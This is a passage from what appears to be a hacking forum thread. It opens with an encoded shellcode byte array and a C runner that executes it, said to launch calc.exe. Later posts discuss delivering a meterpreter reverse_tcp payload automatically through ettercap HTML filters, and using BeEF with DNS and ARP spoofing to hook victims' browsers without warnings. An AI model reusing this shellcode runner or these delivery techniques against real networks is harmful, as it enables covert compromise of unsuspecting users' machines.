"\xc4\x65\x6c\x77\x4d\xb2\xbc\xa5\xa7\x98\xe0\xd1\x87\xec\x44"
"\x59\xd1\x3c\x29\xe1\x18\x0d\x8d\x69\x3d\x0b\x71\xf1\xf3\xe6"
"\xd5\x79\xc0\x38\xba\x01\x1c\x09\x1e\x89\x68\x59\xc2\x11\xa1"
"\xa9\xa6\x99\xf8\xf9\x0a\x21\xc2\xc9\xee\xa9\x52\x4c\x53\x31"
"\xfd\xf6\x37\xb9\x67\x91\x9b\x41\x0e\x3b\x78\xc9\xfe\xf3\xdc"
"\x51\xcf\xc3\x80\xd9\x1f\x14\x65\x61\x50\x64\xb7\x9b\xb2\xd8"
"\xcf\xfd\xd4\xbc\x57\x67\x7f\x61\xd0\x01\x19\xc5\x58\xab\x83"
"\xa9\xe0\x03\x7c\x0e\x69\x53\x4c\xf2\xf1\xa3\x9c\x28\x39";

int main(int argc, char **argv) {
	/* the decoder stub at the start of the buffer unpacks the rest in
	   place, so this page has to be writable as well as executable */
	int (*func)();
	func = (int (*)()) shellcode;
	func();
	return 0;
}
It should run calc.exe yet again.
I hope that is the information you were looking for. What exactly in the folder were you hoping to encode or use? Let me know and I'll work on it.

#17 mcurran (Guest)

    Would there be a way to write executable instructions like this directly in the html filter, instead of in the created/downloaded meterpreter file? It would be good if we had a simple redirect with an automatic reverse_tcp on the redirect connect, instead of having the client download, get warned numerous times, and then install...

#18 Just burned his ISO (joined Nov 2008, 14 posts)

Hi mcurran,
I would never be one to say that anything is impossible, but I think the easiest way to do this may be with BeEF, the browser exploitation framework. I have noticed that ettercap does not work too well with IE8, although I have not kept up with newer versions, posts, workarounds, etc... BeEF may be more effective if you simply rely on DNS redirection from ettercap to the BeEF server.
Just a thought...

#19 mcurran (Guest)

    You would still need to use ettercap or other dns and arp spoofing applications in order to redirect and create zombies in beef, wouldn't you?
